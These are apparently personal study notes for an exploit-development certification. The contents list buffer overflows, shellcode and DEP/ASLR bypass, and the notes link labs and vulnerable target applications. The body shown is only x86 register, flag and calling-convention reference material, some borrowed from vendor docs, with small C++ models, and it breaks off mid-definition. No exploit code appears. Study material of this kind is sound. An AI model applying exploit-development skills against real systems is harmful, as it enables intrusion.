OSED Notes Study Overview by Joas Antonio


https://www.linkedin.com/in/joas-antonio-dos-santos
Contents
OSED Notes by Joas Antonio and Alex
Laboratory
X86 Architecture
CPU Register
General Purpose Registers
eax
ebx
ecx
edx
esi
edi
ebp
esp
Special Purpose Registers
eip
flags
Introduction Windows Debugger
Windows Register
Controlling Execution with Windbg
Stack Based Buffer Overflow
Data Execution Prevention
Address Space Layout Randomization
Control Flow Guard
Stack Buffer Overflow - Jumping Shellcode
SEH Buffer Overflow
Finding Bad Characters
IDA Pro
Windows ASLR Bypass
Egg Hunters
Introduction to the Win32 Egghunter
SEH Buffer Overflow EggHunter
Shellcode
Shellcode Encode and Decode
Creating Shellcode Encoded
DEP Bypass
Overwriting EIP
ASLR Bypass
Return Oriented Programming
Rop Chain
Rop Decode
Reversing Engineering
Reverse Engineering with Immunity Debugger
Reverse Engineering with GDB
Assembly and C/C++ Courses
Study Material – OSED

Laboratory
https://github.com/CyberSecurityUP/Buffer-Overflow-Labs

https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-overflow-vulnerability-lab.md

https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab

https://github.com/tecnico-sec/Buffer-Overflow

https://github.com/epi052/osed-scripts

Advantech WebAccess webvrpcs.exe

Sync Breeze Enterprise 10.0.28

Intelligent Management Center (iMC)

SLMail 5.5

X86 Architecture
What Does x86 Architecture Mean?

The x86 architecture is an instruction set architecture (ISA) series for computer processors.
Developed by Intel Corporation, x86 architecture defines how a processor handles and
executes different instructions passed from the operating system (OS) and software programs.
The “x” in x86 stands for the varying leading digits in the model numbers of the processor
family (8086, 80186, 80286, 80386, 80486).

Techopedia Explains x86 Architecture

Designed in 1978, x86 architecture was one of the first ISAs for microprocessor-based
computing. Key features include:

• Provides a logical framework for executing instructions through a processor

• Allows software programs and instructions to run on any processor in the Intel 8086 family

• Provides procedures for utilizing and managing the hardware components of a central
processing unit (CPU)

The x86 architecture primarily handles programmatic functions and provides services, such as
memory addressing, software and hardware interrupt handling, data type, registers and
input/output (I/O) management.

Classified by bit amount, the x86 architecture is implemented in multiple microprocessors,
including 8086, 80286, 80386, Core 2, Atom and the Pentium series. Additionally, other
microprocessor manufacturers, like AMD and VIA Technologies, have adopted the x86
architecture.

https://www.techopedia.com/definition/5334/x86-architecture

The Intel x86 processor uses complex instruction set computer (CISC) architecture, which
means there is a modest number of special-purpose registers instead of large quantities of
general-purpose registers. It also means that complex special-purpose instructions will
predominate.

The x86 processor traces its heritage at least as far back as the 8-bit Intel 8080 processor.
Many peculiarities in the x86 instruction set are due to the backward compatibility with that
processor (and with its Zilog Z-80 variant).

Microsoft Win32 uses the x86 processor in 32-bit flat mode. This documentation will focus only
on the flat mode.

Registers

The x86 architecture consists of the following unprivileged integer registers.

eax Accumulator

ebx Base register

ecx Counter register

edx Data register - can be used for I/O port access and arithmetic functions

esi Source index register

edi Destination index register

ebp Base pointer register

esp Stack pointer

All integer registers are 32 bit. However, many of them have 16-bit or 8-bit subregisters.

ax Low 16 bits of eax

bx Low 16 bits of ebx

cx Low 16 bits of ecx

dx Low 16 bits of edx

si Low 16 bits of esi

di Low 16 bits of edi

bp Low 16 bits of ebp

sp Low 16 bits of esp

al Low 8 bits of eax

ah High 8 bits of ax

bl Low 8 bits of ebx

bh High 8 bits of bx

cl Low 8 bits of ecx

ch High 8 bits of cx

dl Low 8 bits of edx

dh High 8 bits of dx

Operating on a subregister affects only the subregister and none of the parts outside the
subregister. For example, storing to the ax register leaves the high 16 bits of the eax register
unchanged.
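
The subregister rule above can be modelled with plain bit masks. The following is a minimal Python sketch, not debugger or CPU code; the helper names (write_ax, write_al, write_ah, read_ah) are hypothetical and exist only for this illustration.

```python
# Hypothetical helpers that model eax as a 32-bit integer.
# Writing a subregister replaces only the bits that belong to it.

def write_ax(eax, value):
    """Store a 16-bit value into ax; the high 16 bits of eax are kept."""
    return (eax & 0xFFFF0000) | (value & 0xFFFF)

def write_al(eax, value):
    """Store an 8-bit value into al (bits 0-7 of eax)."""
    return (eax & 0xFFFFFF00) | (value & 0xFF)

def write_ah(eax, value):
    """Store an 8-bit value into ah (bits 8-15 of eax, the high byte of ax)."""
    return (eax & 0xFFFF00FF) | ((value & 0xFF) << 8)

def read_ah(eax):
    """Read ah, the high 8 bits of ax."""
    return (eax >> 8) & 0xFF

eax = 0x12345678
print(hex(write_ax(eax, 0xBEEF)))  # 0x1234beef: high 16 bits untouched
```

The masks make the layout explicit: ax is the low half of eax, and al and ah are the low and high bytes of ax.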

When using the ? (Evaluate Expression) command, registers should be prefixed with an "at"
sign ( @ ). For example, you should use ? @ax rather than ? ax. This ensures that the debugger
recognizes ax as a register rather than a symbol.

However, the (@) is not required in the r (Registers) command. For instance, r ax=5 will always
be interpreted correctly.

Two other registers are important for the processor's current state.

eip instruction pointer

flags flags

The instruction pointer is the address of the instruction being executed.

The flags register is a collection of single-bit flags. Many instructions alter the flags to describe
the result of the instruction. These flags can then be tested by conditional jump instructions.
See x86 Flags for details.

Calling Conventions

The x86 architecture has several different calling conventions. Fortunately, they all follow the
same register preservation and function return rules:

• Functions must preserve all registers, except for eax, ecx, and edx, which can be
changed across a function call, and esp, which must be updated according to the
calling convention.

• The eax register receives function return values if the result is 32 bits or smaller. If the
result is 64 bits, then the result is stored in the edx:eax pair.

The following is a list of calling conventions used on the x86 architecture:

• Win32 (__stdcall)

Function parameters are passed on the stack, pushed right to left, and the callee cleans the
stack.

• Native C++ method call (also known as thiscall)

Function parameters are passed on the stack, pushed right to left, the "this" pointer is passed
in the ecx register, and the callee cleans the stack.

• COM (__stdcall for C++ method calls)

Function parameters are passed on the stack, pushed right to left, then the "this" pointer is
pushed on the stack, and then the function is called. The callee cleans the stack.

• __fastcall

The first two DWORD-or-smaller arguments are passed in the ecx and edx registers. The
remaining parameters are passed on the stack, pushed right to left. The callee cleans the stack.

• __cdecl

Function parameters are passed on the stack, pushed right to left, and the caller cleans the
stack. The __cdecl calling convention is used for all functions with variable-length parameters.

Debugger Display of Registers and Flags

Here is a sample debugger register display:

eax=00000000 ebx=008b6f00 ecx=01010101 edx=ffffffff esi=00000000 edi=00465000

eip=77f9d022 esp=05cffc48 ebp=05cffc54 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286

In user-mode debugging, you can ignore the iopl and the entire last line of the debugger
display.
x86 Flags

In the preceding example, the two-letter codes at the end of the second line are flags. These
are single-bit registers and have a variety of uses.

The following table lists the x86 flags:

Flag Code  Flag Name             Value  Flag Status  Description
of         Overflow Flag         0 1    nv ov        No overflow - Overflow
df         Direction Flag        0 1    up dn        Direction up - Direction down
if         Interrupt Flag        0 1    di ei        Interrupts disabled - Interrupts enabled
sf         Sign Flag             0 1    pl ng        Positive (or zero) - Negative
zf         Zero Flag             0 1    nz zr        Nonzero - Zero
af         Auxiliary Carry Flag  0 1    na ac        No auxiliary carry - Auxiliary carry
pf         Parity Flag           0 1    po pe        Parity odd - Parity even
cf         Carry Flag            0 1    nc cy        No carry - Carry

tf (Trap Flag): If tf equals 1, the processor will raise a STATUS_SINGLE_STEP exception after
the execution of one instruction. This flag is used by a debugger to implement single-step
tracing. It should not be used by other applications.

iopl (I/O Privilege Level): This is a two-bit integer, with values between zero and 3. It is
used by the operating system to control access to hardware. It should not be used by
applications.

When registers are displayed as a result of some command in the Debugger Command
window, it is the flag status that is displayed. However, if you want to change a flag using the r
(Registers) command, you should refer to it by the flag code.

In the Registers window of WinDbg, the flag code is used to view or alter flags. The flag status
is not supported.

Here is an example. In the preceding register display, the flag status ng appears. This means
that the sign flag is currently set to 1. To change this, use the following command:

r sf=0

This sets the sign flag to zero. If you do another register display, the ng status code will not
appear. Instead, the pl status code will be displayed.
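
As a rough illustration of how the two-letter status codes relate to the efl value, the sketch below decodes an EFLAGS value in Python. The bit positions follow the standard EFLAGS layout; the function names flag_status and clear_sign_flag are hypothetical, and the parity mapping assumes Intel's definition, where PF=1 means even parity.

```python
# (bit position, status shown when the bit is 0, status shown when it is 1),
# listed in the order the debugger prints them.
FLAG_BITS = [
    (11, "nv", "ov"),  # of: overflow flag
    (10, "up", "dn"),  # df: direction flag
    (9,  "di", "ei"),  # if: interrupt flag
    (7,  "pl", "ng"),  # sf: sign flag
    (6,  "nz", "zr"),  # zf: zero flag
    (4,  "na", "ac"),  # af: auxiliary carry flag
    (2,  "po", "pe"),  # pf: parity flag (assumption: 1 = even parity)
    (0,  "nc", "cy"),  # cf: carry flag
]

def flag_status(efl):
    """Return the flag status string for a given efl value."""
    return " ".join(one if (efl >> bit) & 1 else zero
                    for bit, zero, one in FLAG_BITS)

def clear_sign_flag(efl):
    """Model the effect of 'r sf=0': clear bit 7 and leave the rest alone."""
    return efl & ~(1 << 7)

print(flag_status(0x246))                   # nv up ei pl zr na pe nc
print(flag_status(clear_sign_flag(0x286)))  # nv up ei pl nz na pe nc
```

Clearing the sign flag only changes one bit of efl, which is why only the ng/pl field changes in the display.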

The Sign Flag, Zero Flag, and Carry Flag are the most commonly-used flags.
Conditions

A condition describes the state of one or more flags. All conditional operations on the x86 are
expressed in terms of conditions.

The assembler uses a one or two letter abbreviation to represent a condition. A condition can
be represented by multiple abbreviations. For example, AE ("above or equal") is the same
condition as NB ("not below"). The following table lists some common conditions and their
meaning.

Condition Name  Flags  Meaning
Z               ZF=1   Result of last operation was zero.
NZ              ZF=0   Result of last operation was not zero.
C               CF=1   Last operation required a carry or borrow. (For unsigned integers, this indicates overflow.)
NC              CF=0   Last operation did not require a carry or borrow. (For unsigned integers, this indicates no overflow.)
S               SF=1   Result of last operation has its high bit set.
NS              SF=0   Result of last operation has its high bit clear.
O               OF=1   When treated as a signed integer operation, the last operation caused an overflow or underflow.
NO              OF=0   When treated as a signed integer operation, the last operation did not cause an overflow or underflow.

Conditions can also be used to compare two values. The cmp instruction compares its two
operands and sets the flags as if it had subtracted the second operand from the first, without
storing the result. The following conditions can be used to check the result of cmp value1, value2.

Condition Name  Flags            Meaning after a CMP operation
E               ZF=1             value1 == value2.
NE              ZF=0             value1 != value2.
GE, NL          SF=OF            value1 >= value2. Values are treated as signed integers.
LE, NG          ZF=1 or SF!=OF   value1 <= value2. Values are treated as signed integers.
G, NLE          ZF=0 and SF=OF   value1 > value2. Values are treated as signed integers.
L, NGE          SF!=OF           value1 < value2. Values are treated as signed integers.
AE, NB          CF=0             value1 >= value2. Values are treated as unsigned integers.
BE, NA          CF=1 or ZF=1     value1 <= value2. Values are treated as unsigned integers.
A, NBE          CF=0 and ZF=0    value1 > value2. Values are treated as unsigned integers.
B, NAE          CF=1             value1 < value2. Values are treated as unsigned integers.

Conditions are typically used to act on the result of a cmp or test instruction. For example,

cmp eax, 5

jz equal

compares the eax register against the number 5 by computing the expression (eax - 5) and
setting flags according to the result. If the result of the subtraction is zero, then the zr flag will
be set, and the jz condition will be true so the jump will be taken.
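
To make the relationship between cmp, the flags and the condition names concrete, here is a small Python model. It is only a sketch: cmp_flags and condition_holds are hypothetical names, the operands are assumed to be 32-bit, and the flag rules are the usual ones for a subtraction.

```python
def cmp_flags(value1, value2, bits=32):
    """Compute ZF, SF, CF and OF as 'cmp value1, value2' would set them."""
    mask = (1 << bits) - 1
    sign = 1 << (bits - 1)
    a, b = value1 & mask, value2 & mask
    result = (a - b) & mask
    return {
        "ZF": int(result == 0),
        "SF": int(bool(result & sign)),
        "CF": int(a < b),  # a borrow was needed (unsigned a < b)
        # signed overflow: operands differ in sign and the result's sign
        # differs from the sign of the first operand
        "OF": int(bool((a ^ b) & (a ^ result) & sign)),
    }

# One entry per condition; synonyms such as NL or NB map to the same test.
CONDITIONS = {
    "E":  lambda f: f["ZF"] == 1,
    "NE": lambda f: f["ZF"] == 0,
    "GE": lambda f: f["SF"] == f["OF"],
    "LE": lambda f: f["ZF"] == 1 or f["SF"] != f["OF"],
    "G":  lambda f: f["ZF"] == 0 and f["SF"] == f["OF"],
    "L":  lambda f: f["SF"] != f["OF"],
    "AE": lambda f: f["CF"] == 0,
    "BE": lambda f: f["CF"] == 1 or f["ZF"] == 1,
    "A":  lambda f: f["CF"] == 0 and f["ZF"] == 0,
    "B":  lambda f: f["CF"] == 1,
}

def condition_holds(name, value1, value2):
    """Would a jump on condition 'name' be taken after cmp value1, value2?"""
    return CONDITIONS[name](cmp_flags(value1, value2))

print(condition_holds("E", 5, 5))   # True: cmp eax, 5 / jz taken when eax is 5
print(condition_holds("L", -1, 1))  # True: signed view, -1 < 1
print(condition_holds("B", -1, 1))  # False: unsigned view, 0xFFFFFFFF > 1
```

The last two lines show why signed and unsigned conditions exist separately: the same bit pattern compares differently depending on which flags the condition reads.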

Data Types

• byte: 8 bits

• word: 16 bits

• dword: 32 bits

• qword: 64 bits (includes floating-point doubles)

• tword: 80 bits (includes floating-point extended doubles)

• oword: 128 bits

Notation

The following table indicates the notation used to describe assembly language instructions.

Notation Meaning

r, r1, r2... Registers

m Memory address (see the succeeding Addressing Modes section for more information.)

#n Immediate constant

r/m Register or memory

r/#n Register or immediate constant

r/m/#n Register, memory, or immediate constant

cc A condition code listed in the preceding Conditions section.

T "B", "W", or "D" (byte, word or dword)

accT Size T accumulator: al if T = "B", ax if T = "W", or eax if T = "D"

Addressing Modes

There are several different addressing modes, but they all take the form T ptr [expr],
where T is some data type (see the preceding Data Types section) and expr is some expression
involving constants and registers.

The notation for most modes can be deduced without much difficulty. For example, BYTE PTR
[esi+edx*8+3] means "take the value of the esi register, add to it eight times the value of
the edx register, add three, then access the byte at the resulting address."
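
The address computation in that example can be written out as a short Python sketch. The function name effective_address and the dictionary used as "memory" are assumptions made for illustration; only the arithmetic (base + index * scale + displacement, wrapped to 32 bits) comes from the text above.

```python
def effective_address(base=0, index=0, scale=1, disp=0):
    """Compute base + index*scale + disp, wrapped to 32 bits."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("x86 allows only scale factors 1, 2, 4 and 8")
    return (base + index * scale + disp) & 0xFFFFFFFF

# BYTE PTR [esi+edx*8+3] with esi = 0x1000 and edx = 2
esi, edx = 0x1000, 2
address = effective_address(base=esi, index=edx, scale=8, disp=3)

memory = {0x1013: 0x41}      # toy memory: address -> byte value
print(hex(address))          # 0x1013
print(hex(memory[address]))  # 0x41, the byte that would be accessed
```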

Pipelining
The Pentium is dual-issue, which means that it can perform up to two actions in one clock tick.
However, the rules on when it is capable of doing two actions at once (known as pairing) are
very complicated.

Because x86 is a CISC processor, you do not have to worry about jump delay slots.

Synchronized Memory Access

Load, modify, and store instructions can receive a lock prefix, which modifies the instruction as
follows:

1. Before issuing the instruction, the CPU will flush all pending memory operations to
ensure coherency. All data prefetches are abandoned.

2. While issuing the instruction, the CPU will have exclusive access to the bus. This
ensures the atomicity of the load/modify/store operation.

The xchg instruction automatically obeys the previous rules whenever it exchanges a value
with memory.

All other instructions default to nonlocking.

Jump Prediction

Unconditional jumps are predicted to be taken.

Conditional jumps are predicted to be taken or not taken, depending on whether they were
taken the last time they were executed. The cache for recording jump history is limited in size.

If the CPU does not have a record of whether the conditional jump was taken or not taken the
last time it was executed, it predicts backward conditional jumps as taken and forward
conditional jumps as not taken.
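
The prediction rules above can be summarized in a few lines of Python. This is a simplified sketch of the rules as stated, not of real hardware: predict_taken and record_outcome are hypothetical names, and the history is an unbounded dictionary, whereas the text notes that the real history cache is limited in size.

```python
def predict_taken(jump_address, target_address, conditional, history):
    """Predict whether the jump at jump_address will be taken."""
    if not conditional:
        return True                       # unconditional jumps: always taken
    if jump_address in history:
        return history[jump_address]      # repeat what happened last time
    return target_address < jump_address  # no record: backward taken, forward not

def record_outcome(jump_address, taken, history):
    """Remember whether the jump was actually taken."""
    history[jump_address] = taken

history = {}
# A backward conditional jump (typical loop) with no history is predicted taken.
print(predict_taken(0x401020, 0x401000, True, history))  # True
record_outcome(0x401020, False, history)
print(predict_taken(0x401020, 0x401000, True, history))  # False
```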

Alignment

The x86 processor will automatically correct unaligned memory access, at a performance
penalty. No exception is raised.

A memory access is considered aligned if the address is an integer multiple of the object size.
For example, all BYTE accesses are aligned (everything is an integer multiple of 1), WORD
accesses to even addresses are aligned, and DWORD accesses are aligned only when the address
is a multiple of 4.

The lock prefix should not be used for unaligned memory accesses.
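
The alignment rule reduces to a single modulo test, sketched here in Python. The name is_aligned is hypothetical; sizes are given in bytes (1 for BYTE, 2 for WORD, 4 for DWORD).

```python
def is_aligned(address, size):
    """An access is aligned if the address is a multiple of the object size."""
    return address % size == 0

print(is_aligned(0x1003, 1))  # True: every BYTE access is aligned
print(is_aligned(0x1002, 2))  # True: WORD access to an even address
print(is_aligned(0x1002, 4))  # False: DWORD access needs a multiple of 4
```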

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/x86-architecture

https://opensecuritytraining.info/IntermediateX86.html

https://www.youtube.com/watch?v=OJxHs-DSQkc

CPU Register
In computer architecture, registers are very fast memory inside the CPU, used to execute
programs and operations efficiently. They do this by giving immediate access to commonly used
values, i.e., the values that are being operated on at that moment. For this purpose there are
several classes of CPU registers, which work in coordination with main memory to run
operations efficiently.

The sole purpose of having registers is fast retrieval of data for processing by the CPU.
Although fetching instructions from RAM is much faster than fetching them from a hard drive, it
still is not fast enough for the CPU. For better performance, the CPU contains memory that can
receive data from RAM shortly before it is needed. Below registers in the memory hierarchy is
cache memory, which is faster than RAM but slower than registers.

These are classified as given below.

• Accumulator:
This is the most frequently used register for storing data taken from memory. The number of
accumulators differs between microprocessors.

• Memory Address Registers (MAR):

It holds the address of the location to be accessed from memory. MAR and MDR
(Memory Data Register) together facilitate the communication of the CPU and the
main memory.

• Memory Data Registers (MDR):

It contains data to be written into or to be read out from the addressed location.

• General Purpose Registers:

These are numbered as R0, R1, R2….Rn-1, and used to store temporary data during any
ongoing operation. Their contents can be accessed from assembly code. Modern
CPU architectures tend to use more GPRs so that register-to-register addressing can be
used more, which is comparatively faster than other addressing modes.

• Program Counter (PC):

The Program Counter (PC) keeps track of program execution. It contains the memory
address of the next instruction to be fetched from main memory once the previous
instruction has completed. How far the PC advances depends on the architecture. On
an architecture with fixed-length 4-byte instructions, the PC is incremented by 4 on
every fetch; on x86, where instructions vary in length, the instruction pointer advances
by the length of the instruction just fetched.

• Instruction Register (IR):

The IR holds the instruction that is about to be executed. The instruction at the address
held in the PC is fetched and stored in the IR. As soon as the instruction is placed in the IR,
the CPU starts executing it and the PC points to the next instruction to be executed.

• Condition code register ( CCR ) :

Condition code registers contain flags that indicate the status of an operation. For
instance, if an operation produces a negative or zero result, the corresponding flags
are set. The flags are:

1. Carry C: Set to 1 if an add operation produces a carry or a subtract operation produces
a borrow; otherwise cleared to 0.

2. Overflow V: Useful only during operations on signed integers.

3. Zero Z: Set to 1 if the result is 0, otherwise cleared to 0.

4. Negative N: Meaningful only in signed number operations. Set to 1 if a negative result is
produced.

5. Extend X: Functions as a carry for multiple precision arithmetic operations.

These flags are generally set by the ALU.

So, these are the different registers which are operating for a specific purpose.

https://www.geeksforgeeks.org/different-classes-of-cpu-registers/

Operations of a CPU Register

Registers play a critical role in CPU processing. Input values are held in registers, processed
there, and the output is read back from registers.

With the help of its registers, the CPU performs the following operations.

• Fetch: Retrieve the next instruction from main memory, in program order

• Decode: Work out which operation the fetched instruction specifies and which operands
it needs

• Execute: Carry out the decoded operation. The result is written back to a register or to
memory
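
The fetch, decode and execute steps can be illustrated with a toy machine in Python. Everything here is invented for the example: the three-instruction set (LOAD, ADD, HALT), the tuple encoding and the run function are assumptions, not a model of x86. The sketch only shows how the program counter, instruction register and accumulator interact.

```python
def run(program):
    """Execute a toy program; return (accumulator, program counter)."""
    pc = 0    # program counter: index of the next instruction
    acc = 0   # accumulator: holds intermediate and final results
    while True:
        ir = program[pc]        # fetch: copy the instruction into the IR
        pc += 1                 # the PC now points at the next instruction
        opcode, *operands = ir  # decode: split opcode and operands
        if opcode == "LOAD":    # execute
            acc = operands[0]
        elif opcode == "ADD":
            acc += operands[0]
        elif opcode == "HALT":
            return acc, pc
        else:
            raise ValueError(f"unknown opcode: {opcode}")

program = [("LOAD", 2), ("ADD", 3), ("HALT",)]
print(run(program))  # (5, 3)
```

Note that the PC is advanced right after the fetch, so while an instruction executes the PC already holds the address of the one that follows it.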

Different types of Memory Register

Various types of registers are available. The most commonly used CPU registers are listed
below and described afterwards.

• Accumulator (AC)

• Flag Register

• Address Register (AR)

• Data Register (DR)

• Program Counter (PC)

• Instruction Register (IR)

• Stack Control Register (SCR)

• Memory Buffer Register (MBR)

• Index register (IR)

These registers are an integral part of the computer, and each has a specific purpose,
described below.

1. Accumulator

The accumulator register is part of the ALU (Arithmetic Logic Unit), which, as the name
suggests, is responsible for performing arithmetic and logical operations. The control unit
stores the data values fetched from main memory in the accumulator for arithmetic or logical
operations. This register holds the initial data, the intermediate results and the final result
of the instruction. The final result of the operation is transferred to main memory through
the MBR.

2. Flag Register

This special register records whether various conditions have occurred in the CPU. Its size is
one or two bytes, since it holds only flag information. It mainly comes into play when a
conditional operation is executed.

3. Data Register

This register is used to temporarily store the data being transmitted from the other involved
peripheral devices.

4. Address register

The address register, also called the memory address register (MAR), is a memory unit that
stores the address of data or instructions in main memory. It may contain a portion of
the address, which can be used to compute the complete address.

5. Program Counter

This register is also popularly known as the instruction pointer. As the name suggests, it
holds the address of the next instruction to be fetched and executed. When an instruction is
fetched, the value is incremented, so the register always holds the address of the next
instruction to run.

6. Instruction Register

Once an instruction is fetched from main memory, it is stored in the Instruction Register (IR).
The control unit takes the instruction from here, decodes it and executes it by sending the
required signals to the required components.

7. Stack Control Register SCR

The word "stack" in the name of this register refers to a set of memory blocks in which data
is stored and from which it is retrieved. Data is stored and retrieved in FILO (First In, Last
Out) order.

8. Memory Buffer Register

This register holds the data that is read from or written to memory. Instructions held in this
register are transferred to the Instruction Register (IR), whereas data is transferred to the
accumulator or an I/O register.

9. Index Register

The index register is an integral part of the CPU that helps modify the address of a memory
operand during program execution. The contents of the index register are added to the
immediate address to obtain the effective address of the data or instruction in memory.

Why we need a CPU register?

CPU registers are essential for executing instructions quickly; without them, CPU operation is
unimaginable. They are the fastest memory available and hold the top position in the memory
hierarchy. A register can hold an instruction, an address, or any other sort of data. There are
different types of registers, and the most commonly used ones are described above. Registers
make the operations of the CPU smooth, efficient and meaningful. A register must be large
enough for its requirements and specifications.

Advantages and Disadvantages

Advantages

• Registers are the fastest memory blocks, so instructions that operate on them execute
faster than those that access main memory

• Each register has its own purpose, which lets the CPU handle instructions smoothly

• Virtually every CPU in the digital world has registers

Disadvantages

• Register capacity is finite, so when an operation needs more data than fits, the CPU must
use cache or main memory along with the registers

https://www.educba.com/what-is-cpu-register/

Some registers are typically volatile across function calls, while others remain unchanged.
This is a compiler convention and must be honored in the code: registers are not preserved
automatically (on some architectures they are, but not on x86). This means that when a
function is called, there is no guarantee that volatile registers will retain their value when
the function returns, and it is the called function's responsibility to preserve non-volatile
registers.

The conventions used by Microsoft's compiler are:

• Volatile: ecx, edx

• Non-Volatile: ebx, esi, edi, ebp

• Special: eax, esp (discussed later)

General Purpose Registers

This section will look at the 8 general purpose registers on the x86 architecture.

eax
eax is a 32-bit general-purpose register with two common uses: to store the return value of
a function and as a special register for certain calculations. It is technically a volatile
register, since the value isn't preserved. Instead, its value is set to the return value of a
function before a function returns. Other than esp, this is probably the most important
register to remember for this reason. eax is also used specifically in certain calculations,
such as multiplication and division, as a special register. That use will be examined in the
instructions section.
Here is an example of a function returning in C:

return 3; // Return the value 3

Here's the same code in assembly:

mov eax, 3 ; Set eax (the return value) to 3

ret ; Return

ebx
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a
commonly used value (such as 0) throughout a function to speed up calculations.

ecx
ecx is a volatile general-purpose register that is occasionally used as a function parameter
or as a loop counter.
Functions of the "__fastcall" convention pass the first two parameters to a function using
ecx and edx. Additionally, when calling a member function of a class, a pointer to that class
is often passed in ecx no matter what the calling convention is.
Additionally, ecx is often used as a loop counter. for loops generally, although not always,
keep their counter variable in ecx. rep- instructions also use ecx as a counter,
automatically decrementing it until it reaches 0. This class of instruction will be discussed
in a later section.

edx
edx is a volatile general-purpose register that is occasionally used as a function parameter.
Like ecx, edx is used for "__fastcall" functions.
Besides fastcall, edx is generally used for storing short-term variables within a function.

esi
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for
"rep-" class instructions, which require a source and a destination for data, esi points to the
"source". Because esi is non-volatile, it is also often used to hold a value that is needed
throughout a function.

edi
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to
esi, except that it is generally used as a destination for data.
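
The roles of esi, edi and ecx in a "rep-" instruction can be sketched in C++. This is only a model of rep movsb with the direction flag clear, not real machine behaviour: the Regs struct, the flat byte-vector memory and the function names are assumptions made for illustration.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical register file holding only the three registers used here.
struct Regs {
    std::uint32_t esi;  // source offset
    std::uint32_t edi;  // destination offset
    std::uint32_t ecx;  // remaining byte count
};

// Models "rep movsb": copy one byte from [esi] to [edi], advance both
// pointers, decrement ecx, and repeat until ecx reaches 0.
inline void rep_movsb(Regs& r, std::vector<std::uint8_t>& mem) {
    while (r.ecx != 0) {
        mem.at(r.edi) = mem.at(r.esi);
        ++r.esi;
        ++r.edi;
        --r.ecx;
    }
}

// Usage: copy three bytes from offset 0 to offset 3.
inline void example_rep_movsb() {
    std::vector<std::uint8_t> mem = {'a', 'b', 'c', 0, 0, 0};
    Regs r{0, 3, 3};
    rep_movsb(r, mem);
    assert(mem[3] == 'a' && mem[4] == 'b' && mem[5] == 'c');
    assert(r.esi == 3 && r.edi == 6 && r.ecx == 0);
}
```

After the copy, ecx is 0 and both pointers have moved past the data, which is why code that needs the original pointers saves them first.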

ebp
ebp is a non-volatile general-purpose register that has two distinct uses depending on
compile settings: it is either the frame pointer or a general purpose register.
If compilation is not optimized, or code is written by hand, ebp keeps track of where the
stack is at the beginning of a function (the stack will be explained in great detail in a later
section). Because the stack changes throughout a function, having ebp set to the original
value allows variables stored on the stack to be referenced easily. This will be explored in
detail when the stack is explained.
If compilation is optimized, ebp is used as a general register for storing any kind of data,
while calculations for the stack pointer are done based on the stack pointer moving (which
gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)

esp
esp is a special register that stores a pointer to the top of the stack (the top is actually at a
lower virtual address than the bottom as the stack grows downwards in memory towards
the heap). Math is rarely done directly on esp, and the value of esp must be the same at
the beginning and the end of each function. esp will be examined in much greater detail in
a later section.
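
The two claims above (the top of the stack sits at the lower address, and esp ends a function where it started) can be sketched with a small model. The Stack32 type, the sparse memory map and the starting address are assumptions for illustration only.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// Hypothetical model of a 32-bit stack: esp plus a sparse memory map.
struct Stack32 {
    std::uint32_t esp;
    std::map<std::uint32_t, std::uint32_t> mem;

    // push: move esp down by 4, then store the value at the new top.
    void push(std::uint32_t value) { esp -= 4; mem[esp] = value; }

    // pop: read the value at the top, then move esp back up by 4.
    std::uint32_t pop() { std::uint32_t v = mem.at(esp); esp += 4; return v; }
};

inline void example_stack() {
    Stack32 s{0x0012ff80u, {}};      // starting esp is an arbitrary example value
    const std::uint32_t entry_esp = s.esp;
    s.push(0x11111111u);
    s.push(0x22222222u);
    assert(s.esp == entry_esp - 8);  // the top moved to a lower address
    assert(s.pop() == 0x22222222u);  // last in, first out
    assert(s.pop() == 0x11111111u);
    assert(s.esp == entry_esp);      // balanced pushes and pops restore esp
}
```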

Special Purpose Registers

For special purpose and floating point registers not listed here, have a look at the Wikipedia
Article or other reference sites.

eip
eip, or the instruction pointer, is a special-purpose register which stores the
address of the instruction that is currently executing. Making a jump is like adding to or
subtracting from the instruction pointer.
After each instruction, a value equal to the size of the instruction is added to eip, which
means that eip points at the machine code for the next instruction. This simple example
shows the automatic addition to eip at every step:

eip+1 53 push ebx

eip+4 8B 54 24 08 mov edx, [esp+arg_0]
eip+2 31 DB xor ebx, ebx
eip+2 89 D3 mov ebx, edx
eip+3 8D 42 07 lea eax, [edx+7]
.....
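
The same bookkeeping can be written out as a short C++ sketch. The instruction lengths are taken from the byte counts in the listing above; the start address 0x00401000 and the function name are assumptions for illustration.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Given the address of the first instruction and each instruction's encoded
// length in bytes, return the value of eip after each instruction executes
// (straight-line code only, no jumps).
inline std::vector<std::uint32_t> eip_after_each(
        std::uint32_t start, const std::vector<std::uint8_t>& lengths) {
    std::vector<std::uint32_t> out;
    std::uint32_t eip = start;
    for (std::uint8_t len : lengths) {
        eip += len;          // eip advances by the size of the instruction
        out.push_back(eip);
    }
    return out;
}

inline void example_eip() {
    // push ebx (1), mov edx,[esp+arg_0] (4), xor ebx,ebx (2),
    // mov ebx,edx (2), lea eax,[edx+7] (3)
    std::vector<std::uint32_t> eips =
        eip_after_each(0x00401000u, {1, 4, 2, 2, 3});
    assert(eips[0] == 0x00401001u);
    assert(eips[1] == 0x00401005u);
    assert(eips[4] == 0x0040100cu);
}
```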

flags
In the flags register, each bit has a specific meaning and they are used to store meta-
information about the results of previous operations. For example, whether the last
calculation overflowed the register or whether the operands were equal. Our interest in the
flags register is usually around the cmp and test operations which will commonly set or
unset the zero, carry and overflow flags. These flags will then be tested by a conditional
jump which may be controlling program flow or a loop.
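
As a rough illustration, the effect of cmp a, b on the zero, carry and overflow flags can be modelled in C++. cmp performs the subtraction a - b and discards the result; the Flags struct and the function name are assumptions made for this sketch, and the other flags cmp updates are left out.

```cpp
#include <cassert>
#include <cstdint>

// Only the three flags named in the text; the real register has more.
struct Flags {
    bool zf;  // zero flag: result was zero (operands equal)
    bool cf;  // carry flag: unsigned borrow (a < b as unsigned values)
    bool of;  // overflow flag: signed result did not fit in 32 bits
};

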